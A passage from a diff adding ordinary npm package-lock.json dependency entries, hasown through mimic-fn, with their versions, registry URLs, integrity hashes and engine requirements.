+ "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", + "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "dependencies": { + "function-bind": "^1.1.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/http-errors": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/http-errors/-/http-errors-2.0.0.tgz", + "integrity": "sha512-FtwrG/euBzaEjYeRqOgly7G0qviiXoJWnvEH2Z1plBdXgbyjv34pHTSb9zoeHMyDy33+DWy5Wt9Wo+TURtOYSQ==", + "dependencies": { + "depd": "2.0.0", + "inherits": "2.0.4", + "setprototypeof": "1.2.0", + "statuses": "2.0.1", + "toidentifier": "1.0.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/http-signature": { + "version": "1.3.6", + "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.3.6.tgz", + "integrity": "sha512-3adrsD6zqo4GsTqtO7FyrejHNv+NgiIfAfv68+jVlFmSr9OGy7zrxONceFRLKvnnZA5jbxQBX1u9PpB6Wi32Gw==", + "dependencies": { + "assert-plus": "^1.0.0", + "jsprim": "^2.0.2", + "sshpk": "^1.14.1" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/human-signals": { + "version": "1.1.1", + "resolved": 
"https://registry.npmjs.org/human-signals/-/human-signals-1.1.1.tgz", + "integrity": "sha512-SEQu7vl8KjNL2eoGBLF3+wAjpsNfA9XMlXAYj/3EdaNfAlxKthD1xjEQfGOUhllCGGJVNY34bRr6lPINhNjyZw==", + "engines": { + "node": ">=8.12.0" + } + }, + "node_modules/iconv-lite": { + "version": "0.4.24", + "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.4.24.tgz", + "integrity": "sha512-v3MXnZAcvnywkTUEZomIActle7RXXeedOR31wwl7VlyoXO4Qi9arvSenNQWne1TcRwhCL1HwLI21bEqdpj8/rA==", + "dependencies": { + "safer-buffer": ">= 2.1.2 < 3" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/ieee754": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.2.1.tgz", + "integrity": "sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/ignore": { + "version": "5.3.1", + "resolved": "https://registry.npmjs.org/ignore/-/ignore-5.3.1.tgz", + "integrity": "sha512-5Fytz/IraMjqpwfd34ke28PTVMjZjJG2MPn5t7OE4eUCUNf8BAa7b5WUS9/Qvr6mwOQS7Mk6vdsMno5he+T8Xw==", + "engines": { + "node": ">= 4" + } + }, + "node_modules/indent-string": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/indent-string/-/indent-string-4.0.0.tgz", + "integrity": "sha512-EdDDZu4A2OyIK7Lr/2zG+w5jmbuk1DVBnEwREQvBzspBJkCEbRa8GxU1lghYcaGJCnRWibjDXlq779X1/y5xwg==", + "engines": { + "node": ">=8" + } + }, + "node_modules/inherits": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", + "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" + }, + "node_modules/ini": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ini/-/ini-2.0.0.tgz", + "integrity": "sha512-7PnF4oN3CvZF23ADhA5wRaYEQpJ8qygSkbtTXWBeXWXmEVRXK+1ITciHWwHhsjv1TmW0MgacIv6hEi5pX5NQdA==", + "engines": { + "node": ">=10" + } + }, + "node_modules/internal-slot": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/internal-slot/-/internal-slot-1.0.6.tgz", + "integrity": "sha512-Xj6dv+PsbtwyPpEflsejS+oIZxmMlV44zAhG479uYu89MsjcYOhCFnNyKrkJrihbsiasQyY0afoCl/9BLR65bg==", + "dependencies": { + "get-intrinsic": "^1.2.2", + "hasown": "^2.0.0", + "side-channel": "^1.0.4" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/ipaddr.js": { + "version": "1.9.1", + "resolved": "https://registry.npmjs.org/ipaddr.js/-/ipaddr.js-1.9.1.tgz", + "integrity": "sha512-0KI/607xoxSToH7GjN1FfSbLoU0+btTicjsQSWQlh/hZykN8KpmMf7uYwPW3R+akZ6R/w18ZlXSHBYXiYUPO3g==", + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/is-arguments": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/is-arguments/-/is-arguments-1.1.1.tgz", + "integrity": "sha512-8Q7EARjzEnKpt/PCD7e1cgUS0a6X8u5tdSiMqXhojOdoV9TsMsiO+9VLC5vAmO8N7/GmXn7yjR8qnA6bVAEzfA==", + "dependencies": { + "call-bind": "^1.0.2", + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-array-buffer": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/is-array-buffer/-/is-array-buffer-3.0.2.tgz", + "integrity": "sha512-y+FyyR/w8vfIRq4eQcM1EYgSTnmHXPqaF+IgzgraytCFq5Xh8lllDVmAZolPJiZttZLeFSINPYMaEJ7/vWUa1w==", + "dependencies": { + "call-bind": 
"^1.0.2", + "get-intrinsic": "^1.2.0", + "is-typed-array": "^1.1.10" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-bigint": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/is-bigint/-/is-bigint-1.0.4.tgz", + "integrity": "sha512-zB9CruMamjym81i2JZ3UMn54PKGsQzsJeo6xvN3HJJ4CAsQNB6iRutp2To77OfCNuoxspsIhzaPoO1zyCEhFOg==", + "dependencies": { + "has-bigints": "^1.0.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-boolean-object": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/is-boolean-object/-/is-boolean-object-1.1.2.tgz", + "integrity": "sha512-gDYaKHJmnj4aWxyj6YHyXVpdQawtVLHU5cb+eztPGczf6cjuTdwve5ZIEfgXqH4e57An1D1AKf8CZ3kYrQRqYA==", + "dependencies": { + "call-bind": "^1.0.2", + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-callable": { + "version": "1.2.7", + "resolved": "https://registry.npmjs.org/is-callable/-/is-callable-1.2.7.tgz", + "integrity": "sha512-1BC0BVFhS/p0qtw6enp8e+8OD0UrK0oFLztSjNzhcKA3WDuJxxAPXzPuPtKkjEY9UUoEWlX/8fgKeu2S8i9JTA==", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-ci": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/is-ci/-/is-ci-3.0.1.tgz", + "integrity": "sha512-ZYvCgrefwqoQ6yTyYUbQu64HsITZ3NfKX1lzaEYdkTDcfKzzCI/wthRRYKkdjHKFVgNiXKAKm65Zo1pk2as/QQ==", + "dependencies": { + "ci-info": "^3.2.0" + }, + "bin": { + "is-ci": "bin.js" + } + }, + "node_modules/is-date-object": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/is-date-object/-/is-date-object-1.0.5.tgz", + "integrity": "sha512-9YQaSxsAiSwcvS33MBk3wTCVnWK+HhF8VZR2jRxehM16QcVOdHqPn4VPHmRK4lSr38n9JriurInLcP90xsYNfQ==", + "dependencies": { + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-fullwidth-code-point": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", + "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", + "engines": { + "node": ">=8" + } + }, + "node_modules/is-installed-globally": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/is-installed-globally/-/is-installed-globally-0.4.0.tgz", + "integrity": "sha512-iwGqO3J21aaSkC7jWnHP/difazwS7SFeIqxv6wEtLU8Y5KlzFTjyqcSIT0d8s4+dDhKytsk9PJZ2BkS5eZwQRQ==", + "dependencies": { + "global-dirs": "^3.0.0", + "is-path-inside": "^3.0.2" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-map": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/is-map/-/is-map-2.0.2.tgz", + "integrity": "sha512-cOZFQQozTha1f4MxLFzlgKYPTyj26picdZTx82hbc/Xf4K/tZOOXSCkMvU4pKioRXGDLJRn0GM7Upe7kR721yg==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-number-object": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/is-number-object/-/is-number-object-1.0.7.tgz", + "integrity": "sha512-k1U0IRzLMo7ZlYIfzRu23Oh6MiIFasgpb9X76eqfFZAqwH44UI4KTBvBYIZ1dSL9ZzChTB9ShHfLkR4pdW5krQ==", + "dependencies": { + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": 
"https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-path-inside": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/is-path-inside/-/is-path-inside-3.0.3.tgz", + "integrity": "sha512-Fd4gABb+ycGAmKou8eMftCupSir5lRxqf4aD/vd0cD2qc4HL07OjCeuHMr8Ro4CoMaeCKDB0/ECBOVWjTwUvPQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/is-regex": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/is-regex/-/is-regex-1.1.4.tgz", + "integrity": "sha512-kvRdxDsxZjhzUX07ZnLydzS1TU/TJlTUHHY4YLL87e37oUA49DfkLqgy+VjFocowy29cKvcSiu+kIv728jTTVg==", + "dependencies": { + "call-bind": "^1.0.2", + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-set": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/is-set/-/is-set-2.0.2.tgz", + "integrity": "sha512-+2cnTEZeY5z/iXGbLhPrOAaK/Mau5k5eXq9j14CpRTftq0pAJu2MwVRSZhyZWBzx3o6X795Lz6Bpb6R0GKf37g==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-shared-array-buffer": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/is-shared-array-buffer/-/is-shared-array-buffer-1.0.2.tgz", + "integrity": "sha512-sqN2UDu1/0y6uvXyStCOzyhAjCSlHceFoMKJW8W9EU9cvic/QdsZ0kEU93HEy3IUEFZIiH/3w+AH/UQbPHNdhA==", + "dependencies": { + "call-bind": "^1.0.2" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-stream": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", + "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-string": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/is-string/-/is-string-1.0.7.tgz", + "integrity": "sha512-tE2UXzivje6ofPW7l23cjDOMa09gb7xlAqG6jG5ej6uPV32TlWP3NKPigtaGeHNu9fohccRYvIiZMfOOnOYUtg==", + "dependencies": { + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-symbol": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/is-symbol/-/is-symbol-1.0.4.tgz", + "integrity": "sha512-C/CPBqKWnvdcxqIARxyOh4v1UUEOCHpgDa0WYgpKDFMszcrPcffg5uhwSgPCLD2WWxmq6isisz87tzT01tuGhg==", + "dependencies": { + "has-symbols": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-typed-array": { + "version": "1.1.12", + "resolved": "https://registry.npmjs.org/is-typed-array/-/is-typed-array-1.1.12.tgz", + "integrity": "sha512-Z14TF2JNG8Lss5/HMqt0//T9JeHXttXy5pH/DBU4vi98ozO2btxzq9MwYDZYnKwU8nRsz/+GVFVRDq3DkVuSPg==", + "dependencies": { + "which-typed-array": "^1.1.11" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-typedarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", + "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" + }, + "node_modules/is-unicode-supported": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/is-unicode-supported/-/is-unicode-supported-0.1.0.tgz", + "integrity": 
"sha512-knxG2q4UC3u8stRGyAVJCOdxFmv5DZiRcdlIaAQXAbSfJya+OhopNotLQrstBhququ4ZpuKbDc/8S6mgXgPFPw==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-weakmap": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/is-weakmap/-/is-weakmap-2.0.1.tgz", + "integrity": "sha512-NSBR4kH5oVj1Uwvv970ruUkCV7O1mzgVFO4/rev2cLRda9Tm9HrL70ZPut4rOHgY0FNrUu9BCbXA2sdQ+x0chA==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-weakset": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/is-weakset/-/is-weakset-2.0.2.tgz", + "integrity": "sha512-t2yVvttHkQktwnNNmBQ98AhENLdPUTDTE21uPqAQ0ARwQfGeQKRVS0NNurH7bTf7RrvcVn1OOge45CnBeHCSmg==", + "dependencies": { + "call-bind": "^1.0.2", + "get-intrinsic": "^1.1.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/isarray": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-2.0.5.tgz", + "integrity": "sha512-xHjhDr3cNBK0BzdUJSPXZntQUx/mwMS5Rw4A7lPJ90XGAO6ISP/ePDNuo0vhqOZU+UD5JoodwCAAoZQd3FeAKw==" + }, + "node_modules/isexe": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", + "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" + }, + "node_modules/isomorphic-git": { + "version": "1.25.10", + "resolved": "https://registry.npmjs.org/isomorphic-git/-/isomorphic-git-1.25.10.tgz", + "integrity": "sha512-IxGiaKBwAdcgBXwIcxJU6rHLk+NrzYaaPKXXQffcA0GW3IUrQXdUPDXDo+hkGVcYruuz/7JlGBiuaeTCgIgivQ==", + "dependencies": { + "async-lock": "^1.4.1", + "clean-git-ref": "^2.0.1", + "crc-32": "^1.2.0", + "diff3": "0.0.3", + "ignore": "^5.1.4", + "minimisted": "^2.0.0", + "pako": "^1.0.10", + "pify": "^4.0.1", + "readable-stream": "^3.4.0", + "sha.js": "^2.4.9", + "simple-get": "^4.0.1" + }, + "bin": { + "isogit": "cli.cjs" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/isomorphic-git/node_modules/pify": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/pify/-/pify-4.0.1.tgz", + "integrity": "sha512-uB80kBFb/tfd68bVleG9T5GGsGPjJrLAUpR5PZIrhBnIaRTQRjqdJSsIKkOP6OAIFbj7GOrcudc5pNjZ+geV2g==", + "engines": { + "node": ">=6" + } + }, + "node_modules/isomorphic-textencoder": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/isomorphic-textencoder/-/isomorphic-textencoder-1.0.1.tgz", + "integrity": "sha512-676hESgHullDdHDsj469hr+7t3i/neBKU9J7q1T4RHaWwLAsaQnywC0D1dIUId0YZ+JtVrShzuBk1soo0+GVcQ==", + "dependencies": { + "fast-text-encoding": "^1.0.0" + } + }, + "node_modules/isstream": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", + "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" + }, + "node_modules/joi": { + "version": "17.13.1", + "resolved": "https://registry.npmjs.org/joi/-/joi-17.13.1.tgz", + "integrity": "sha512-vaBlIKCyo4FCUtCm7Eu4QZd/q02bWcxfUO6YSXAZOWF6gzcLBeba8kwotUdYJjDLW8Cz8RywsSOqiNJZW0mNvg==", + "dependencies": { + "@hapi/hoek": "^9.3.0", + "@hapi/topo": "^5.1.0", + "@sideway/address": "^4.1.5", + "@sideway/formula": "^3.0.1", + "@sideway/pinpoint": "^2.0.0" + } + }, + "node_modules/js-tokens": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==" + }, 
+ "node_modules/js-yaml": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", + "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", + "dependencies": { + "argparse": "^2.0.1" + }, + "bin": { + "js-yaml": "bin/js-yaml.js" + } + }, + "node_modules/jsbn": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", + "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" + }, + "node_modules/json-schema": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", + "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" + }, + "node_modules/json-stringify-safe": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", + "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" + }, + "node_modules/jsonfile": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/jsonfile/-/jsonfile-6.1.0.tgz", + "integrity": "sha512-5dgndWOriYSm5cnYaJNhalLNDKOqFwyDB/rr1E9ZsGciGvKPs8R2xYGCacuf3z6K1YKDz182fd+fY3cn3pMqXQ==", + "dependencies": { + "universalify": "^2.0.0" + }, + "optionalDependencies": { + "graceful-fs": "^4.1.6" + } + }, + "node_modules/jsprim": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-2.0.2.tgz", + "integrity": "sha512-gqXddjPqQ6G40VdnI6T6yObEC+pDNvyP95wdQhkWkg7crHH3km5qP1FsOXEkzEQwnz6gz5qGTn1c2Y52wP3OyQ==", + "engines": [ + "node >=0.6.0" + ], + "dependencies": { + "assert-plus": "1.0.0", + "extsprintf": "1.3.0", + "json-schema": "0.4.0", + "verror": "1.10.0" + } + }, + "node_modules/just-debounce-it": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/just-debounce-it/-/just-debounce-it-1.1.0.tgz", + "integrity": "sha512-87Nnc0qZKgBZuhFZjYVjSraic0x7zwjhaTMrCKlj0QYKH6lh0KbFzVnfu6LHan03NO7J8ygjeBeD0epejn5Zcg==" + }, + "node_modules/just-once": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/just-once/-/just-once-1.1.0.tgz", + "integrity": "sha512-+rZVpl+6VyTilK7vB/svlMPil4pxqIJZkbnN7DKZTOzyXfun6ZiFeq2Pk4EtCEHZ0VU4EkdFzG8ZK5F3PErcDw==" + }, + "node_modules/lazy-ass": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/lazy-ass/-/lazy-ass-1.6.0.tgz", + "integrity": "sha512-cc8oEVoctTvsFZ/Oje/kGnHbpWHYBe8IAJe4C0QNc3t8uM/0Y8+erSz/7Y1ALuXTEZTMvxXwO6YbX1ey3ujiZw==", + "engines": { + "node": "> 0.8" + } + }, + "node_modules/listr2": { + "version": "3.14.0", + "resolved": "https://registry.npmjs.org/listr2/-/listr2-3.14.0.tgz", + "integrity": "sha512-TyWI8G99GX9GjE54cJ+RrNMcIFBfwMPxc3XTFiAYGN4s10hWROGtOg7+O6u6LE3mNkyld7RSLE6nrKBvTfcs3g==", + "dependencies": { + "cli-truncate": "^2.1.0", + "colorette": "^2.0.16", + "log-update": "^4.0.0", + "p-map": "^4.0.0", + "rfdc": "^1.3.0", + "rxjs": "^7.5.1", + "through": "^2.3.8", + "wrap-ansi": "^7.0.0" + }, + "engines": { + "node": ">=10.0.0" + }, + "peerDependencies": { + "enquirer": ">= 2.3.0 < 3" + }, + "peerDependenciesMeta": { + "enquirer": { + "optional": true + } + } + }, + "node_modules/lodash": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", + "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" + }, + "node_modules/lodash.once": { + "version": 
"4.1.1", + "resolved": "https://registry.npmjs.org/lodash.once/-/lodash.once-4.1.1.tgz", + "integrity": "sha512-Sb487aTOCr9drQVL8pIxOzVhafOjZN9UU54hiN8PU3uAiSV7lx1yYNpbNmex2PK6dSJoNTSJUUswT651yww3Mg==" + }, + "node_modules/log-symbols": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/log-symbols/-/log-symbols-4.1.0.tgz", + "integrity": "sha512-8XPvpAA8uyhfteu8pIvQxpJZ7SYYdpUivZpGy6sFsBuKRY/7rQGavedeB8aK+Zkyq6upMFVL/9AW6vOYzfRyLg==", + "dependencies": { + "chalk": "^4.1.0", + "is-unicode-supported": "^0.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/log-update": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/log-update/-/log-update-4.0.0.tgz", + "integrity": "sha512-9fkkDevMefjg0mmzWFBW8YkFP91OrizzkW3diF7CpG+S2EYdy4+TVfGwz1zeF8x7hCx1ovSPTOE9Ngib74qqUg==", + "dependencies": { + "ansi-escapes": "^4.3.0", + "cli-cursor": "^3.1.0", + "slice-ansi": "^4.0.0", + "wrap-ansi": "^6.2.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/log-update/node_modules/slice-ansi": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/slice-ansi/-/slice-ansi-4.0.0.tgz", + "integrity": "sha512-qMCMfhY040cVHT43K9BFygqYbUPFZKHOg7K73mtTWJRb8pyP3fzf4Ixd5SzdEJQ6MRUg/WBnOLxghZtKKurENQ==", + "dependencies": { + "ansi-styles": "^4.0.0", + "astral-regex": "^2.0.0", + "is-fullwidth-code-point": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/slice-ansi?sponsor=1" + } + }, + "node_modules/log-update/node_modules/wrap-ansi": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-6.2.0.tgz", + "integrity": "sha512-r6lPcBGxZXlIcymEu7InxDMhdW0KDxpLgoFLcguasxCaJ/SOIZwINatK9KY/tf+ZrlywOKU0UDj3ATXUBfxJXA==", + "dependencies": { + "ansi-styles": "^4.0.0", + "string-width": "^4.1.0", + "strip-ansi": "^6.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/lz-string": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/lz-string/-/lz-string-1.5.0.tgz", + "integrity": "sha512-h5bgJWpxJNswbU7qCrV0tIKQCaS3blPDrqKWx+QxzuzL1zGUzij9XCWLrSLsJPu5t+eWA/ycetzYAO5IOMcWAQ==", + "bin": { + "lz-string": "bin/bin.js" + } + }, + "node_modules/math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/media-typer": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz", + "integrity": "sha512-dq+qelQ9akHpcOl/gUVRTxVIOkAJ1wR3QAvb4RsVjS8oVoFjDGTc679wJYmUmknUF5HwMLOgb5O+a3KxfWapPQ==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/merge-descriptors": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/merge-descriptors/-/merge-descriptors-1.0.3.tgz", + "integrity": "sha512-gaNvAS7TZ897/rVaZ0nMtAyxNyi/pdbjbAwUpFQpN70GqnVfOiXpeUUMKRBmzXaSQ8DdTX4/0ms62r2K+hE6mQ==", + "funding": { + 
"url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/merge-stream": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", + "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==" + }, + "node_modules/methods": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/methods/-/methods-1.1.2.tgz", + "integrity": "sha512-iclAHeNqNm68zFtnZ0e+1L2yUIdvzNoauKU4WBA3VvH/vPFieF7qfRlwUZU+DA9P9bPXIS90ulxoUoCH23sV2w==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/mime": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/mime/-/mime-1.6.0.tgz", + "integrity": "sha512-x0Vn8spI+wuJ1O6S7gnbaQg8Pxh4NNHb7KSINmEWKiPE4RKOplvijn+NkmYmmRgP68mc70j2EbeTFRsrswaQeg==", + "bin": { + "mime": "cli.js" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/mime-db": { + "version": "1.52.0", + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", + "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/mime-types": { + "version": "2.1.35", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", + "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", + "dependencies": { + "mime-db": "1.52.0" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/mimic-fn": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", + "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", + "engines": { + "node": ">=6" + } + }, 